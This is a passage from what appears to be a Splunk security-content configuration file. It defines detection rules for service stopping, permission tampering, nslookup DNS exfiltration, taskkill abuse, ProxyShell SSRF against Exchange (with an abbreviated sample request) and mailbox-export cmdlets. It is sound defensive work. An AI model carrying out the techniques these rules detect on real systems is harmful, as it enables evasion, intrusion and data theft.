"taskhostex.exe", pid_count, 0) | stats sum(taskhost_count_) as taskhost_count, sum(taskhostex_count_) as taskhostex_count, min(firstTime) as firstTime, max(lastTime) as lastTime by _time, dest | where taskhost_count > 10 and taskhostex_count > 10 | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `excessive_number_of_taskhost_processes_filter` [ESCU - Excessive Service Stop Attempt - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic identifies a suspicious series of attempts to stop or delete multiple services on a system using either `net.exe` or `sc.exe`. This technique is used by adversaries to terminate security services or other related services in order to continue their objective and evade detection. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1489"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic identifies a suspicious series of attempts to stop or delete multiple services on a system using either `net.exe` or `sc.exe`. This technique is used by adversaries to terminate security services or other related services in order to continue their objective and evade detection. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. 
action.escu.known_false_positives = Administrators or uninstall scripts that stop or remove many services in one pass may trigger this. Filter as needed. action.escu.creation_date = 2021-05-04 action.escu.modification_date = 2021-05-04 action.escu.confidence = high action.escu.full_search_name = ESCU - Excessive Service Stop Attempt - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["XMRig", "Ransomware", "BlackByte Ransomware"] action.risk = 1 action.risk.param._risk_message = An excessive number of $process_name$ executions attempting to stop or delete services was observed on $dest$. action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 80}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 80}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Excessive Service Stop Attempt - Rule action.correlationsearch.annotations = {"analytic_story": ["XMRig", "Ransomware", "BlackByte Ransomware"], "cis20": ["CIS 10"], "confidence": 100, "impact": 80, "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1489"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` values(Processes.process) as process values(Processes.process_id) as process_id count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (`process_net` OR Processes.process_name = "sc.exe" OR Processes.process_name = "net1.exe") AND (Processes.process="*stop*" OR 
Processes.process="*delete*") by Processes.process_name Processes.original_file_name Processes.parent_process_name Processes.dest Processes.user _time span=1m | where count >=5 | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `excessive_service_stop_attempt_filter` [ESCU - Excessive Usage Of Cacls App - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies excessive usage of the `cacls.exe`, `xcacls.exe` or `icacls.exe` application to change file or folder permissions. This behavior is commonly seen where the adversary attempts to prevent users from deleting or accessing its malware components or artifacts on the compromised system. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1222"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies excessive usage of the `cacls.exe`, `xcacls.exe` or `icacls.exe` application to change file or folder permissions. This behavior is commonly seen where the adversary attempts to prevent users from deleting or accessing its malware components or artifacts on the compromised system. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. 
action.escu.known_false_positives = Administrators or administrative scripts may use this application. Filter as needed. action.escu.creation_date = 2021-05-07 action.escu.modification_date = 2021-05-07 action.escu.confidence = high action.escu.full_search_name = ESCU - Excessive Usage Of Cacls App - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["XMRig", "Azorult", "Windows Post-Exploitation", "Prestige Ransomware"] action.risk = 1 action.risk.param._risk_message = An excessive amount of $process_name$ was executed on $dest$ attempting to modify permissions. action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 80}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 80}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Excessive Usage Of Cacls App - Rule action.correlationsearch.annotations = {"analytic_story": ["XMRig", "Azorult", "Windows Post-Exploitation", "Prestige Ransomware"], "cis20": ["CIS 10"], "confidence": 100, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1222"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` values(Processes.process) as process values(Processes.process_id) as process_id values(Processes.process_name) as process_name count min(_time) as firstTime max(_time) as lastTime from 
datamodel=Endpoint.Processes where Processes.process_name = "cacls.exe" OR Processes.process_name = "icacls.exe" OR Processes.process_name = "XCACLS.exe" by Processes.parent_process_name Processes.parent_process Processes.dest Processes.user _time span=1m | where count >=10 | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `excessive_usage_of_cacls_app_filter` [ESCU - Excessive Usage Of Net App - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic identifies excessive usage of `net.exe` or `net1.exe` within a bucket of time (1 minute). This behavior was seen in a Monero incident where the adversary attempts to create many users, delete and disable users as part of its malicious behavior. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1531"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic identifies excessive usage of `net.exe` or `net1.exe` within a bucket of time (1 minute). This behavior was seen in a Monero incident where the adversary attempts to create many users, delete and disable users as part of its malicious behavior. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. 
action.escu.known_false_positives = unknown. Filter as needed. Modify the time span as needed. action.escu.creation_date = 2023-06-13 action.escu.modification_date = 2023-06-13 action.escu.confidence = high action.escu.full_search_name = ESCU - Excessive Usage Of Net App - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Prestige Ransomware", "Graceful Wipe Out Attack", "XMRig", "Windows Post-Exploitation", "Azorult", "Ransomware", "Rhysida Ransomware"] action.risk = 1 action.risk.param._risk_message = Excessive usage of net1.exe or net.exe within 1m, with command line $process$ has been detected on $dest$ by $user$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 28}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 28}, {"threat_object_field": "process_name", "threat_object_type": "process"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Excessive Usage Of Net App - Rule action.correlationsearch.annotations = {"analytic_story": ["Prestige Ransomware", "Graceful Wipe Out Attack", "XMRig", "Windows Post-Exploitation", "Azorult", "Ransomware", "Rhysida Ransomware"], "cis20": ["CIS 10"], "confidence": 70, "impact": 40, "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1531"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats 
`security_content_summariesonly` values(Processes.process) as process values(Processes.process_id) as process_id count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_net` by Processes.process_name Processes.parent_process_name Processes.original_file_name Processes.dest Processes.user _time span=1m | where count >=10 | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `excessive_usage_of_net_app_filter` [ESCU - Excessive Usage of NSLOOKUP App - Rule] action.escu = 0 action.escu.enabled = 1 description = This search detects potential DNS exfiltration or command-and-control traffic generated with the nslookup application. This technique has been seen in several malware families and APT groups to exfiltrate collected data from an infected machine or network. The detection counts nslookup.exe executions per host in one-minute buckets and flags a minute whose count exceeds both a fixed floor of 20 and three standard deviations above that host's average across the search window. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1048"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This search detects potential DNS exfiltration or command-and-control traffic generated with the nslookup application. This technique has been seen in several malware families and APT groups to exfiltrate collected data from an infected machine or network. The detection counts nslookup.exe executions per host in one-minute buckets and flags a minute whose count exceeds both a fixed floor of 20 and three standard deviations above that host's average across the search window. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the process name, parent process, and command-line executions from your endpoints. If you are using Sysmon, you must have at least version 6.0.4 of the Sysmon TA. 
Tune and filter known benign uses of nslookup.exe. action.escu.known_false_positives = Monitoring or inventory scripts that call nslookup.exe in a loop may exceed the threshold. Filter as needed. action.escu.creation_date = 2022-06-03 action.escu.modification_date = 2022-06-03 action.escu.confidence = high action.escu.full_search_name = ESCU - Excessive Usage of NSLOOKUP App - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Sysmon"] action.escu.analytic_story = ["Suspicious DNS Traffic", "Dynamic DNS", "Data Exfiltration", "Command And Control"] action.risk = 1 action.risk.param._risk_message = Excessive usage of nslookup.exe has been detected on $dest$. The one-minute execution count exceeded the host's dynamic threshold. action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 28}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Excessive Usage of NSLOOKUP App - Rule action.correlationsearch.annotations = {"analytic_story": ["Suspicious DNS Traffic", "Dynamic DNS", "Data Exfiltration", "Command And Control"], "cis20": ["CIS 10"], "confidence": 70, "impact": 40, "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1048"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `sysmon` EventCode = 1 process_name = "nslookup.exe" | bucket _time span=1m | stats count as numNsLookup by dest, _time | eventstats avg(numNsLookup) as avgNsLookup, stdev(numNsLookup) as stdNsLookup, count as numSlots by dest | eval upperThreshold=(avgNsLookup + stdNsLookup *3) | eval isOutlier=if(numNsLookup > 20 and numNsLookup >= 
upperThreshold, 1, 0) | search isOutlier=1 | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `excessive_usage_of_nslookup_app_filter` [ESCU - Excessive Usage Of SC Service Utility - Rule] action.escu = 0 action.escu.enabled = 1 description = This search is to detect a suspicious excessive usage of sc.exe in a host machine. This technique was seen in several ransomware , xmrig and other malware to create, modify, delete or disable a service may related to security application or to gain privilege escalation. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1569", "T1569.002"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This search is to detect a suspicious excessive usage of sc.exe in a host machine. This technique was seen in several ransomware , xmrig and other malware to create, modify, delete or disable a service may related to security application or to gain privilege escalation. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the process name, parent process, and command-line executions from your endpoints. If you are using Sysmon, you must have at least version 6.0.4 of the Sysmon TA. Tune and filter known instances where renamed taskkill.exe may be used. action.escu.known_false_positives = excessive execution of sc.exe is quite suspicious since it can modify or execute app in high privilege permission. 
action.escu.creation_date = 2021-06-24
action.escu.modification_date = 2021-06-24
action.escu.confidence = high
action.escu.full_search_name = ESCU - Excessive Usage Of SC Service Utility - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Microsoft Sysmon"]
action.escu.analytic_story = ["Ransomware", "Azorult"]
action.risk = 1
action.risk.param._risk_message = Excessive Usage Of SC Service Utility
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 25}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Excessive Usage Of SC Service Utility - Rule
action.correlationsearch.annotations = {"analytic_story": ["Ransomware", "Azorult"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1569", "T1569.002"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `sysmon` EventCode = 1 process_name = "sc.exe" | bucket _time span=15m | stats values(process) as process count as numScExe by dest, _time | eventstats avg(numScExe) as avgScExe, stdev(numScExe) as stdScExe, count as numSlots by dest | eval upperThreshold=(avgScExe + stdScExe *3) | eval isOutlier=if(numScExe > 5 and numScExe >= upperThreshold, 1, 0) | search isOutlier=1 | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `excessive_usage_of_sc_service_utility_filter`

[ESCU - Excessive Usage Of Taskkill - Rule]
action.escu = 0
action.escu.enabled = 1
description = This analytic identifies excessive usage of the `taskkill.exe` application. This application is commonly used by adversaries to evade detection by killing security product processes, or even other processes.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.001", "T1562"], "nist": ["DE.AE"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = This analytic identifies excessive usage of the `taskkill.exe` application. This application is commonly used by adversaries to evade detection by killing security product processes, or even other processes.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = Unknown. Filter as needed.
action.escu.creation_date = 2021-05-04
action.escu.modification_date = 2021-05-04
action.escu.confidence = high
action.escu.full_search_name = ESCU - Excessive Usage Of Taskkill - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["XMRig", "Azorult", "CISA AA22-264A", "AgentTesla", "CISA AA22-277A", "NjRAT"]
action.risk = 1
action.risk.param._risk_message = Excessive usage of taskkill.exe with process id $process_id$ (more than 10 within 1m) has been detected on $dest$ with a parent process of $parent_process_name$.
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 28}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 28}, {"threat_object_field": "parent_process_name", "threat_object_type": "process"}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Excessive Usage Of Taskkill - Rule
action.correlationsearch.annotations = {"analytic_story": ["XMRig", "Azorult", "CISA AA22-264A", "AgentTesla", "CISA AA22-277A", "NjRAT"], "cis20": ["CIS 10"], "confidence": 70, "impact": 40, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.001", "T1562"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` values(Processes.process) as process values(Processes.process_id) as process_id count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name = "taskkill.exe" by Processes.parent_process_name Processes.process_name Processes.dest Processes.user _time span=1m | where count >=10 | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `excessive_usage_of_taskkill_filter`

[ESCU - Exchange PowerShell Abuse via SSRF - Rule]
action.escu = 0
action.escu.enabled = 1
description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. This analytic identifies suspicious behavior related to ProxyShell against on-premise Microsoft Exchange servers. This analytic has been replaced by GUID d436f9e7-0ee7-4a47-864b-6dea2c4e2752, which utilizes the Web data model. \ Modification of this analytic is required to ensure fields are mapped accordingly. \ A suspicious event will have `PowerShell`, the method `POST` and `autodiscover.json`. This is indicative of accessing PowerShell on the back end of Exchange with SSRF. \ An event will look similar to `POST /autodiscover/autodiscover.json a=dsxvu@fnsso.flq/powershell/?X-Rps-CAT=VgEAVAdXaW5kb3d...` (abbreviated). \ Review the source attempting to perform this activity against your environment. In addition, review PowerShell logs and access recently granted to Exchange roles.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Delivery", "Installation"], "mitre_attack": ["T1190", "T1133"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = This analytic identifies suspicious behavior related to ProxyShell against on-premise Microsoft Exchange servers. This analytic has been replaced by GUID d436f9e7-0ee7-4a47-864b-6dea2c4e2752, which utilizes the Web data model. \ Modification of this analytic is required to ensure fields are mapped accordingly. \ A suspicious event will have `PowerShell`, the method `POST` and `autodiscover.json`. This is indicative of accessing PowerShell on the back end of Exchange with SSRF. \ An event will look similar to `POST /autodiscover/autodiscover.json a=dsxvu@fnsso.flq/powershell/?X-Rps-CAT=VgEAVAdXaW5kb3d...` (abbreviated). \ Review the source attempting to perform this activity against your environment. In addition, review PowerShell logs and access recently granted to Exchange roles.
action.escu.how_to_implement = The following analytic requires on-premise Exchange to be logging to Splunk using the TA - https://splunkbase.splunk.com/app/3225. Ensure logs are parsed correctly, or tune the analytic for your environment.
action.escu.known_false_positives = Limited false positives; however, tune as needed.
action.escu.creation_date = 2023-07-10
action.escu.modification_date = 2023-07-10
action.escu.confidence = high
action.escu.full_search_name = ESCU - Exchange PowerShell Abuse via SSRF - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = null
action.escu.analytic_story = ["ProxyShell", "BlackByte Ransomware", "ProxyNotShell"]
action.risk = 1
action.risk.param._risk_message = Activity related to ProxyShell has been identified on $dest$. Review events and take action accordingly.
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 80}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Experimental - Exchange PowerShell Abuse via SSRF - Rule
action.correlationsearch.annotations = {"analytic_story": ["ProxyShell", "BlackByte Ransomware", "ProxyNotShell"], "cis20": ["CIS 10"], "confidence": 100, "impact": 80, "kill_chain_phases": ["Delivery", "Installation"], "mitre_attack": ["T1190", "T1133"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This analytic identifies suspicious behavior related to ProxyShell against on-premise Microsoft Exchange servers. This analytic has been replaced by GUID d436f9e7-0ee7-4a47-864b-6dea2c4e2752, which utilizes the Web data model. \ Modification of this analytic is required to ensure fields are mapped accordingly. \ A suspicious event will have `PowerShell`, the method `POST` and `autodiscover.json`. This is indicative of accessing PowerShell on the back end of Exchange with SSRF. \ An event will look similar to `POST /autodiscover/autodiscover.json a=dsxvu@fnsso.flq/powershell/?X-Rps-CAT=VgEAVAdXaW5kb3d...` (abbreviated). \ Review the source attempting to perform this activity against your environment. In addition, review PowerShell logs and access recently granted to Exchange roles.
action.notable.param.rule_title = Exchange PowerShell Abuse via SSRF
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `exchange` c_uri="*//autodiscover*" cs_uri_query="*PowerShell*" cs_method="POST" | stats count min(_time) as firstTime max(_time) as lastTime by dest, cs_uri_query, cs_method, c_uri | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `exchange_powershell_abuse_via_ssrf_filter`

[ESCU - Exchange PowerShell Module Usage - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic identifies the usage of Exchange PowerShell modules that were recently used for a proof of concept related to ProxyShell. Adversaries may abuse a limited set of PowerShell modules related to Exchange once they have gained access via ProxyShell or ProxyNotShell. \ Inherently, the usage of the modules is not malicious, but reviewing the parallel processes and the user of the session will assist with determining the intent. \ Module - New-MailboxExportRequest will begin the process of exporting the contents of a primary mailbox or archive to a .pst file. \ Module - New-ManagementRoleAssignment can assign a management role to a management role group, management role assignment policy, user, or universal security group (USG). \ Module - New-MailboxSearch cmdlet to create a mailbox search and either get an estimate of search results, place search results on In-Place Hold or copy them to a Discovery mailbox. You can also place all contents in a mailbox on hold by not specifying a search query, which accomplishes similar results as Litigation Hold. \ Module - Get-Recipient cmdlet to view existing recipient objects in your organization. This cmdlet returns all mail-enabled objects (for example, mailboxes, mail users, mail contacts, and distribution groups).
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059", "T1059.001"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = The following analytic identifies the usage of Exchange PowerShell modules that were recently used for a proof of concept related to ProxyShell. Adversaries may abuse a limited set of PowerShell modules related to Exchange once they have gained access via ProxyShell or ProxyNotShell. \ Inherently, the usage of the modules is not malicious, but reviewing the parallel processes and the user of the session will assist with determining the intent. \ Module - New-MailboxExportRequest will begin the process of exporting the contents of a primary mailbox or archive to a .pst file. \ Module - New-ManagementRoleAssignment can assign a management role to a management role group, management role assignment policy, user, or universal security group (USG). \ Module - New-MailboxSearch cmdlet to create a mailbox search and either get an estimate of search results, place search results on In-Place Hold or copy them to a Discovery mailbox. You can also place all contents in a mailbox on hold by not specifying a search query, which accomplishes similar results as Litigation Hold. \ Module - Get-Recipient cmdlet to view existing recipient objects in your organization. This cmdlet returns all mail-enabled objects (for example, mailboxes, mail users, mail contacts, and distribution groups).
action.escu.how_to_implement = To successfully implement this analytic, you will need to enable PowerShell Script Block Logging on some or all endpoints. Additional setup here: https://docs.splunk.com/Documentation/UBA/5.0.4.1/GetDataIn/AddPowerShell#Configure_module_logging_for_PowerShell.
action.escu.known_false_positives = Administrators or power users may use these PowerShell cmdlets for troubleshooting.
action.escu.creation_date = 2023-07-10
action.escu.modification_date = 2023-07-10
action.escu.confidence = high
action.escu.full_search_name = ESCU - Exchange PowerShell Module Usage - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Microsoft Windows"]
action.escu.analytic_story = ["ProxyNotShell", "CISA AA22-277A", "ProxyShell", "BlackByte Ransomware", "CISA AA22-264A"]
action.risk = 1
action.risk.param._risk_message = Suspicious Exchange PowerShell module usage was identified on $dest$.
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 32}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Exchange PowerShell Module Usage - Rule
action.correlationsearch.annotations = {"analytic_story": ["ProxyNotShell", "CISA AA22-277A", "ProxyShell", "BlackByte Ransomware", "CISA AA22-264A"], "cis20": ["CIS 10"], "confidence": 80, "impact": 40, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059", "T1059.001"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic identifies the usage of Exchange PowerShell modules that were recently used for a proof of concept related to ProxyShell. Adversaries may abuse a limited set of PowerShell modules related to Exchange once they have gained access via ProxyShell or ProxyNotShell. \ Inherently, the usage of the modules is not malicious, but reviewing the parallel processes and the user of the session will assist with determining the intent. \ Module - New-MailboxExportRequest will begin the process of exporting the contents of a primary mailbox or archive to a .pst file. \ Module - New-ManagementRoleAssignment can assign a management role to a management role group, management role assignment policy, user, or universal security group (USG). \ Module - New-MailboxSearch cmdlet to create a mailbox search and either get an estimate of search results, place search results on In-Place Hold or copy them to a Discovery mailbox. You can also place all contents in a mailbox on hold by not specifying a search query, which accomplishes similar results as Litigation Hold. \ Module - Get-Recipient cmdlet to view existing recipient objects in your organization. This cmdlet returns all mail-enabled objects (for example, mailboxes, mail users, mail contacts, and distribution groups).
action.notable.param.rule_title = Exchange PowerShell Module Usage
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `powershell` EventCode=4104 ScriptBlockText IN ("*New-MailboxExportRequest*", "*New-ManagementRoleAssignment*", "*New-MailboxSearch*", "*Get-Recipient*", "*Search-Mailbox*") | stats count min(_time) as firstTime max(_time) as lastTime by Opcode Computer UserID EventCode ScriptBlockText | rename Computer as dest | rename UserID as user | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `exchange_powershell_module_usage_filter`

[ESCU - Executable File Written in Administrative SMB Share - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic identifies executable files (.exe or .dll) being written to Windows administrative SMB shares (Admin$, IPC$, C$). This represents suspicious behavior as it is commonly used by tools like PsExec/PaExec and others to stage service binaries before creating and starting a Windows service on remote endpoints. Red Teams and adversaries alike may abuse administrative shares for lateral movement and remote code execution. The Trickbot malware family also implements this behavior to try to infect other machines in the infected network.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1021", "T1021.002"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = The following analytic identifies executable files (.exe or .dll) being written to Windows administrative SMB shares (Admin$, IPC$, C$). This represents suspicious behavior as it is commonly used by tools like PsExec/PaExec and others to stage service binaries before creating and starting a Windows service on remote endpoints. Red Teams and adversaries alike may abuse administrative shares for lateral movement and remote code execution. The Trickbot malware family also implements this behavior to try to infect other machines in the infected network.
action.escu.how_to_implement = To successfully implement this search, you need to be ingesting Windows Security Event Logs with EventCode 5145 enabled. The Windows TA is also required. Also enable the Audit Object Access policy (success/failure) in your group policy.
action.escu.known_false_positives = System administrators may use tools like PsExec for troubleshooting or administration tasks. However, this will typically come only from certain users and certain systems that can be added to an allow list.
action.escu.creation_date = 2024-02-14
action.escu.modification_date = 2024-02-14
action.escu.confidence = high
action.escu.full_search_name = ESCU - Executable File Written in Administrative SMB Share - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Microsoft Windows"]
action.escu.analytic_story = ["Active Directory Lateral Movement", "Prestige Ransomware", "Graceful Wipe Out Attack", "Industroyer2", "IcedID", "Data Destruction", "Hermetic Wiper", "Trickbot"]
action.risk = 1
